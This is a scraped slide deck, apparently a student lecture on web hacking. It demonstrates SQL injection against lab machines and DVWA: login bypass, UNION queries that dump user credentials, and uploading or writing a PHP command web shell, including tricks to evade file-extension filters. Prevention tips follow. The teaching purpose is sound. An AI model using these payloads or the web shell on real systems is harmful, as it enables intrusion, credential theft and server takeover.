ICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdfICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdf
ICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdf
Eryk Budi Pratama
 
Building the Customer Identity Community, Together.pdf
Building the Customer Identity Community, Together.pdfBuilding the Customer Identity Community, Together.pdf
Building the Customer Identity Community, Together.pdf
Cheryl Hung
 
How Top Companies Benefit from Outsourcing
How Top Companies Benefit from OutsourcingHow Top Companies Benefit from Outsourcing
How Top Companies Benefit from Outsourcing
Nascenture
 

Web hacking series part 3

  • 1. ~ Aditya Kamat BMS College of Engineering WEB HACKING SERIES PART-3
  • 2. TOPICS LEARNT TILL NOW :-- • Basics of web and a little about networks. • HTML injection. • SQL injection to bypass authentication. • Buffer overflow attack.
  • 3. CONT… • Bypass Authentication Via Authentication Token Manipulation. • Session hijacking. • Brute forcing login pages using burp. • HTTP parameter pollution.
  • 4. WHAT WILL BE COVERED TODAY:- • SQL injection (Sqli). • Uploading a shell and gaining remote code execution capabilities on the server. • And the prevention of course.
  • 5. WHAT IS SQL?? • Sequential Query Language is a language used to interact with the database. • We are allowed to ask questions in the form of queries and the answers are known as the results. • It’s syntax is very simple and similar to the natural language (English).
  • 6. BASIC OPERATIONS ON A DATABASE:- • Create: Insert data into a database. • Read: Read data from a table in a database. • Update: Update some information present in a database. • Delete: Delete information from a database.
  • 8. LET’S HAVE A LOOK AT AN EXAMPLE QUERY:- • Select * from colleges; • Assuming a table with the name “colleges” exist. • The result of the query will be all the rows of the table. • We can add a constraint with the keyword ‘where’. Example: select * from colleges where name=‘bmsce’; This selects the row which contains ‘bmsce’ in its name column.
  • 9. STEPS FOR INJECTION:- • Search for a vulnerable point (injection point). • Check out the database used. • Inject queries to dump required data.
  • 10. WHAT SHOULD WE FOCUS ON? • Normal query in websites to check for username and password of a user: select username,password from users where username=‘x’ and password=‘y’; • If the query returns a row or more, it means that the user is authentic. • To become the authenticated user, we need to bypass the password check by using ‘or 1=1— • ‘ is used to close the password acceptance string and or 1=1 returns true, thus authenticating the user.
  • 11. LET’S START OFF WITH A DEMO!
  • 13. STEP 1: • Check if the site is vulnerable by adding a single quote at the end. • http://192.16856.100/cat.php?id=1'
  • 14. STEP 2: • Check the number of columns present in the table used by the web page. • http://192.168.56.100/cat.php?id=1 order by 1 • http://192.168.56.100/cat.php?id=1 order by 2 • http://192.168.56.100/cat.php?id=1 order by 3 • http://192.168.56.100/cat.php?id=1 order by 4 • http://192.168.56.100/cat.php?id=1 order by 5 (We get an error here).
  • 15. STEP 3: • Find out the vulnerable column which can be used to dump the data. • http://192.168.56.100/cat.php?id=-1 union select 1,2,3,4 • Union operator is used to combine the result of many select queries and it also removes duplicate rows. • The above query returns a number corresponding to a column which is vulnerable.
  • 16. STEP 4 (NOT NECESSARY): • http://192.168.56.100/cat.php?id=-1 union select 1,@@version,3,4 • @@version return a string that indicates the MySQL server version • @@database returns the default (current) database name • @@user returns the user name and host name provided by the client.
  • 17. STEP 5: • http://192.168.56.100/cat.php?id=-1 union select 1,table_name,3,4 from information_schema.tables • We retrieve all the tables present in the database. • Information_schema.tables consist of the names of all the tables present.
  • 18. STEP 6: • http://192.168.56.100/cat.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name='users‘ • From the previous query, we choose the right table and find out all the columns present in it through this query. Here, we have chosen the table ‘users’
  • 19. STEP 7: • http://192.168.56.100/cat.php?id=-1 union select 1,concat(id,0x3a,login,0x3a,password),3,4 from users • We dump the data present in users table. We need to specify the name of the columns from which the data is to be dumped. • 0x3a is the hex equivalent for ‘:’ . It is used to differentiate between the values from each column.
  • 20. WHAT NEXT?? • We got to decode the password we obtained and use it to login as admin. • The password is in md5 hash format. It can be decoded to ‘P4ssw0rd’ using some online services. • Upload a shell and gain access to the web server.
  • 21. UPLOADING A SHELL: • After gaining admin access, try finding a page which allows uploading of images/documents (/admin/new.php in our case). • Upload our simple php script to be able to pass system commands in the url. • Some website don’t allow you to upload a php file directly. Try changing the extensions to one of these: “Php, php3, pHp, phP, php.test” . • If none of these work, use tamper data to change the extension. • Last hope is to encode the php script into an image using exiftool and then upload the image.
  • 23. LET US TRY OUT THE SAME STEPS HERE TOO! • Try out steps 1 to 7 which was done in the previous example.
  • 24. NEW WAY TO UPLOAD A SHELL:- • Using “INTO OUTFILE”, we can redirect a stream of text to a file. • Simple query we will use: http://192.168.56.100/hacks/DVWA- master/vulnerabilities/sqli/?id=' union select unhex(hex(""hi"")),2 INTO OUTFILE "C:xampphtdocshacksDVWA- mastertext.php"--+&Submit=Submit#
  • 25. CONTD… • In this way, we can insert the php code we used in the previous example to be able to execute system commands. <?php system($_GET['cmd']); ?>
  • 27. PREVENTION:- • Validate all user supplied input. • Use prepared statements. • Review code for all possible injection points. • Store important information in the form of salt+hash in the database. Ref:https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet
  • 28. CONT… • Use a web application firewall. • Run RIPS scanner on PHP code. • Manage Database access accounts with right privileges.
  • 29. ADDITIONAL RESOURCES:- • Try out more php shells at: r57shell.net • SQL injection tutorials at: https://www.youtube.com/watch?v=_Y8A-1GAUiY&list=PLMA3sO- IlLtuREVEaRX0s8d2WeUM0E4bE http://www.sqlinjection.net/ • Practice at: hackthissite.org • Practice VM : https://pentesterlab.com/exercises/from_sqli_to_shell/iso • DVWA: http://www.dvwa.co.uk/